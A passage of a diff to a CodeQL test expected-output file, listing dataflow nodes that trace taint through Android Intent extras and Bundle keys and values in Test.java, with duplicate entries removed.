[android.content.Intent.extras, ] : Number | | Test.java:622:15:622:29 | (...)... : int[] | semmle.label | (...)... : int[] | | Test.java:622:22:622:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:623:4:623:6 | out [post update] : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:623:4:623:6 | out [post update] : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : int[] | | Test.java:623:31:623:32 | in : int[] | semmle.label | in : int[] | | Test.java:624:9:624:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:624:21:624:41 | getIntent_extras(...) : Bundle [] : int[] | semmle.label | getIntent_extras(...) : Bundle [] : int[] | | Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out : Intent [android.content.Intent.extras, ] : int[] | | Test.java:629:13:629:25 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:629:18:629:25 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:630:4:630:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:630:4:630:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:630:31:630:32 | in : Number | semmle.label | in : Number | | Test.java:631:9:631:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:631:21:631:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:636:17:636:33 | (...)... : float[] | semmle.label | (...)... : float[] | | Test.java:636:26:636:33 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:637:4:637:6 | out [post update] : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:637:4:637:6 | out [post update] : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : float[] | | Test.java:637:31:637:32 | in : float[] | semmle.label | in : float[] | | Test.java:638:9:638:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:638:21:638:41 | getIntent_extras(...) : Bundle [] : float[] | semmle.label | getIntent_extras(...) : Bundle [] : float[] | | Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out : Intent [android.content.Intent.extras, ] : float[] | | Test.java:643:15:643:29 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:643:22:643:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:644:4:644:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:644:4:644:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:644:31:644:32 | in : Number | semmle.label | in : Number | | Test.java:645:9:645:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:645:21:645:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:650:18:650:35 | (...)... : double[] | semmle.label | (...)... : double[] | | Test.java:650:28:650:35 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:651:4:651:6 | out [post update] : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:651:4:651:6 | out [post update] : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : double[] | | Test.java:651:31:651:32 | in : double[] | semmle.label | in : double[] | | Test.java:652:9:652:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:652:21:652:41 | getIntent_extras(...) : Bundle [] : double[] | semmle.label | getIntent_extras(...) : Bundle [] : double[] | | Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out : Intent [android.content.Intent.extras, ] : double[] | | Test.java:657:16:657:31 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:657:24:657:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:658:4:658:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:658:4:658:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:658:31:658:32 | in : Number | semmle.label | in : Number | | Test.java:659:9:659:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:659:21:659:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:664:16:664:31 | (...)... : char[] | semmle.label | (...)... : char[] | | Test.java:664:24:664:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:665:4:665:6 | out [post update] : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:665:4:665:6 | out [post update] : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : char[] | | Test.java:665:31:665:32 | in : char[] | semmle.label | in : char[] | | Test.java:666:9:666:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:666:21:666:41 | getIntent_extras(...) : Bundle [] : char[] | semmle.label | getIntent_extras(...) : Bundle [] : char[] | | Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out : Intent [android.content.Intent.extras, ] : char[] | | Test.java:671:14:671:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:671:20:671:27 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:672:4:672:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:672:4:672:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:672:31:672:32 | in : Number | semmle.label | in : Number | | Test.java:673:9:673:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:673:21:673:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:678:16:678:31 | (...)... : byte[] | semmle.label | (...)... : byte[] | | Test.java:678:24:678:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:679:4:679:6 | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:679:4:679:6 | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:679:31:679:32 | in : byte[] | semmle.label | in : byte[] | | Test.java:680:9:680:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:680:21:680:41 | getIntent_extras(...) : Bundle [] : byte[] | semmle.label | getIntent_extras(...) : Bundle [] : byte[] | | Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:685:14:685:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:685:20:685:27 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:686:4:686:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:686:4:686:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:686:31:686:32 | in : Number | semmle.label | in : Number | | Test.java:687:9:687:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:687:21:687:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:692:19:692:37 | (...)... : boolean[] | semmle.label | (...)... : boolean[] | | Test.java:692:30:692:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:693:4:693:6 | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:693:4:693:6 | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:693:31:693:32 | in : boolean[] | semmle.label | in : boolean[] | | Test.java:694:9:694:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:694:21:694:41 | getIntent_extras(...) : Bundle [] : boolean[] | semmle.label | getIntent_extras(...) : Bundle [] : boolean[] | | Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:699:17:699:33 | (...)... : Boolean | semmle.label | (...)... : Boolean | | Test.java:699:26:699:33 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:700:4:700:6 | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:700:4:700:6 | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:700:31:700:32 | in : Boolean | semmle.label | in : Boolean | | Test.java:701:9:701:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:701:21:701:41 | getIntent_extras(...) : Bundle [] : Boolean | semmle.label | getIntent_extras(...) : Bundle [] : Boolean | | Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:706:18:706:35 | (...)... : String[] | semmle.label | (...)... : String[] | | Test.java:706:28:706:35 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:707:4:707:6 | out [post update] : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:707:4:707:6 | out [post update] : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String[] | | Test.java:707:31:707:32 | in : String[] | semmle.label | in : String[] | | Test.java:708:9:708:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:708:21:708:41 | getIntent_extras(...) : Bundle [] : String[] | semmle.label | getIntent_extras(...) : Bundle [] : String[] | | Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out : Intent [android.content.Intent.extras, ] : String[] | | Test.java:713:16:713:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:713:24:713:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:714:4:714:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:714:4:714:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:714:31:714:32 | in : String | semmle.label | in : String | | Test.java:715:9:715:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:715:21:715:41 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:720:22:720:43 | (...)... : Serializable | semmle.label | (...)... : Serializable | | Test.java:720:36:720:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:721:4:721:6 | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:721:4:721:6 | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:721:31:721:32 | in : Serializable | semmle.label | in : Serializable | | Test.java:722:9:722:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:722:21:722:41 | getIntent_extras(...) : Bundle [] : Serializable | semmle.label | getIntent_extras(...) : Bundle [] : Serializable | | Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:727:22:727:43 | (...)... : Parcelable[] | semmle.label | (...)... : Parcelable[] | | Test.java:727:36:727:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:728:4:728:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:728:4:728:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:728:31:728:32 | in : Parcelable[] | semmle.label | in : Parcelable[] | | Test.java:729:9:729:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:729:21:729:41 | getIntent_extras(...) : Bundle [] : Parcelable[] | semmle.label | getIntent_extras(...) : Bundle [] : Parcelable[] | | Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:734:20:734:39 | (...)... : Parcelable | semmle.label | (...)... : Parcelable | | Test.java:734:32:734:39 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:735:4:735:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:735:4:735:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:735:31:735:32 | in : Parcelable | semmle.label | in : Parcelable | | Test.java:736:9:736:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:736:21:736:41 | getIntent_extras(...) : Bundle [] : Parcelable | semmle.label | getIntent_extras(...) : Bundle [] : Parcelable | | Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:741:24:741:47 | (...)... : CharSequence[] | semmle.label | (...)... : CharSequence[] | | Test.java:741:40:741:47 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:742:4:742:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:742:4:742:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:742:31:742:32 | in : CharSequence[] | semmle.label | in : CharSequence[] | | Test.java:743:9:743:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:743:21:743:41 | getIntent_extras(...) : Bundle [] : CharSequence[] | semmle.label | getIntent_extras(...) : Bundle [] : CharSequence[] | | Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:748:22:748:43 | (...)... : CharSequence | semmle.label | (...)... : CharSequence | | Test.java:748:36:748:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:749:4:749:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:749:4:749:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:749:31:749:32 | in : CharSequence | semmle.label | in : CharSequence | | Test.java:750:9:750:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:750:21:750:41 | getIntent_extras(...) : Bundle [] : CharSequence | semmle.label | getIntent_extras(...) : Bundle [] : CharSequence | | Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:755:16:755:31 | (...)... : Bundle | semmle.label | (...)... : Bundle | | Test.java:755:24:755:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:756:4:756:6 | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:756:4:756:6 | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:756:31:756:32 | in : Bundle | semmle.label | in : Bundle | | Test.java:757:9:757:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:757:21:757:41 | getIntent_extras(...) : Bundle [] : Bundle | semmle.label | getIntent_extras(...) : Bundle [] : Bundle | | Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:762:16:762:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:762:24:762:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:763:10:763:11 | in : Intent | semmle.label | in : Intent | @@ -3386,22 +2623,18 @@ nodes | Test.java:769:24:769:52 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:769:44:769:51 | source(...) : String | semmle.label | source(...) : String | | Test.java:770:4:770:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:770:4:770:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:770:18:770:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:771:9:771:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:776:16:776:54 | (...)... : Bundle [] : Object | semmle.label | (...)... : Bundle [] : Object | | Test.java:776:24:776:54 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:776:46:776:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:777:4:777:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:777:4:777:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:777:18:777:19 | in : Bundle [] : Object | semmle.label | in : Bundle [] : Object | | Test.java:778:9:778:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:783:16:783:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:783:24:783:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:784:10:784:11 | in : Intent | semmle.label | in : Intent | @@ -3412,23 +2645,19 @@ nodes | Test.java:790:45:790:73 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:790:65:790:72 | source(...) : String | semmle.label | source(...) : String | | Test.java:791:4:791:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:791:4:791:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:791:18:791:19 | in : Intent [android.content.Intent.extras, ] : String | semmle.label | in : Intent [android.content.Intent.extras, ] : String | | Test.java:792:9:792:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:797:16:797:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:797:24:797:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:797:45:797:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:797:67:797:74 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:798:4:798:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:798:4:798:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:798:18:798:19 | in : Intent [android.content.Intent.extras, ] : Object | semmle.label | in : Intent [android.content.Intent.extras, ] : Object | | Test.java:799:9:799:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:804:16:804:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:804:24:804:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:805:10:805:11 | in : Intent | semmle.label | in : Intent | @@ -3437,12 +2666,10 @@ nodes | Test.java:811:16:811:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:811:24:811:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:812:4:812:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:812:4:812:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:812:33:812:34 | in : String | semmle.label | in : String | | Test.java:813:9:813:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:818:16:818:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:818:24:818:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:819:10:819:11 | in : Intent | semmle.label | in : Intent | @@ -3451,21 +2678,17 @@ nodes | Test.java:825:16:825:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:825:24:825:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:826:4:826:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:826:4:826:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:826:36:826:37 | in : String | semmle.label | in : String | | Test.java:827:9:827:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:832:19:832:37 | (...)... : ArrayList | semmle.label | (...)... : ArrayList | | Test.java:832:30:832:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:833:4:833:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:833:4:833:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:833:42:833:43 | in : ArrayList | semmle.label | in : ArrayList | | Test.java:834:9:834:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:834:21:834:41 | getIntent_extras(...) : Bundle [] : ArrayList | semmle.label | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:839:16:839:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:839:24:839:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:840:10:840:11 | in : Intent | semmle.label | in : Intent | @@ -3474,21 +2697,17 @@ nodes | Test.java:846:16:846:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:846:24:846:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:847:4:847:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:847:4:847:6 | out 